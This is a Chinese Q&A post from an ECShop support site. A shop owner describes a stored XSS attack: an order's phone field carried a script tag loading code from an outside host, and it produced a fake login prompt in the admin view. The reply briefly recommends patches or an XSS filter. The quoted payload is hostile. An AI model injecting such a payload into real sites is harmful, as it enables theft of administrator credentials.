如何防止别人用XSS植入商城?
2016-07-07 15:11 来源:www.chinab4c.com 作者:ecshop专家
| 今天有人提交了一个订单,电话后面有一段代码13811116147<script src=http://xss.tw/**></script>,我打开订单页面后出现对话框,要求输入账号和密码。情况跟这篇文章写的一样“利用XSS打掉某**购物商城”http://www.yunsec.net/a/security/web/jbst/2013/0125/12324.html,请问这是什么情况?有什么后果?应该如何应对?谢谢高手赐教! |
回答:
| 打最新补丁。 最偷懒办法上360网站卫士,或加上注入XSS防御脚本。 |
最近更新
常用插件
- ecshop二次开发商品购买备
ecshop销售统计 插件介绍:ecshop二次开发订单销售统计和商品购买备注服...
- ecshop二次商品订购人信息
ecshop二次商品订购人信息填写插件,有时候给朋友送花,或者是送礼品的...
- ecshop注册推荐送现金插件
ecshop中的促销售功能还不是很完善,随着电子商务系统的发展和进步,...
- ecshop会员中心订单excel倒出
ecshop会员中心订单excel倒出...
- ecshop2.7.2退换货申请插件
ecshop2.7.2退换货申请插件,主要是在 ecshop 现在的基础上,对ecshop的订单处...
ecshop热门问答
ecshop热门资料
ecshop站里
ecshop使用者
ecshop订单跟踪
ecshopnewest
ecshopflash样式
ecshop大学城
ecshop搞活动设置
ecshopunion
ecshop无法付款
ecshopjoyo粉色模板
ecshopglobai
ecshopcategories
ecshop简写
ecshop大侠
ecshop买卖
ecshop行列
ecshop级别
ecshop订单统计
ecshop正式会员
ecshop省略号
ecshop开通
ecshop漏洞
ecshopUCCENTER
ecshopLIUNX
ecshop办公
ecshop小鸟
ecshop尺寸
ecshop臃肿
ecshopCOD
ecshop支持文章自生成吗?